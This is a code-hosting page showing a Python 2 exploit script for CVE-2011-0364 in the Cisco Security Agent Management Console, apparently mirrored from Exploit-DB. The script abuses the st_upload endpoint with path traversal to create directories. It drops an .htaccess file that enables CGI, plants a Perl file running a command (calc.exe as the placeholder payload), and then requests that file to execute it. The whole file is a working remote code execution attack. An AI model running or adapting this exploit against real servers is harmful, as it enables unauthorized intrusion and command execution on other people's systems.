bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/17155.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

89 lines
No EOL
2.7 KiB
Python
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python
# Exploits Cisco Security Agent Management Console st_upload (CVE-2011-0364)
# gerry eisenhaur <gerry.eisenhaur _at_ gmail.com>
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"
def send_request(params=None):
buf = StringIO.StringIO()
headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}
for(key, value) in params.iteritems():
buf.write('--%s\r\n' % _boundary)
buf.write('Content-Disposition: form-data; name="%s"' % key)
buf.write('\r\n\r\n%s\r\n' % value)
buf.write('--' + _boundary + '--\r\n\r\n')
body = buf.getvalue()
conn = httplib.HTTPSConnection(_csamc)
conn.request("POST", "/csamc60/agent", body, headers)
response = conn.getresponse()
print response.status, response.reason
conn.close()
def main():
### Build up required dir tree
dirtree = ["../bin/webserver/htdocs/diag/bin",
"../bin/webserver/htdocs/diag/bin/webserver",
"../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
_params = {
'host_uid': _host_uid,
'jobname': None,
'host': "aa",
'diags': " ",
'diagsu': " ",
'profiler': " ",
'extension': "gee",
}
for path in dirtree:
print "[+] Creating directory: %s" % path
_params['jobname'] = path
send_request(_params)
### Done building path, drop files
print "[+] Dropping .htaccess"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/",
'diags': "",
'diagsu': "",
'profiler': htaccess,
'extension': "/../.htaccess",
})
print "[+] Dropping payload"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/htdocs/gerry",
'diags': perl_path,
'diagsu': "",
'profiler': backdoor,
'extension': "/../exploit.gee",
})
print "[+] Done, Executing dropped file."
try:
conn = httplib.HTTPSConnection(_csamc, timeout=1)
conn.request("GET", "/csamc60/exploit.gee")
response = conn.getresponse()
print response.status, response.reason
print response.read()
except httplib.ssl.SSLError:
pass
print "[+] Finished."
if __name__ == '__main__':
main()
Reference in a new issue View git blame Copy permalink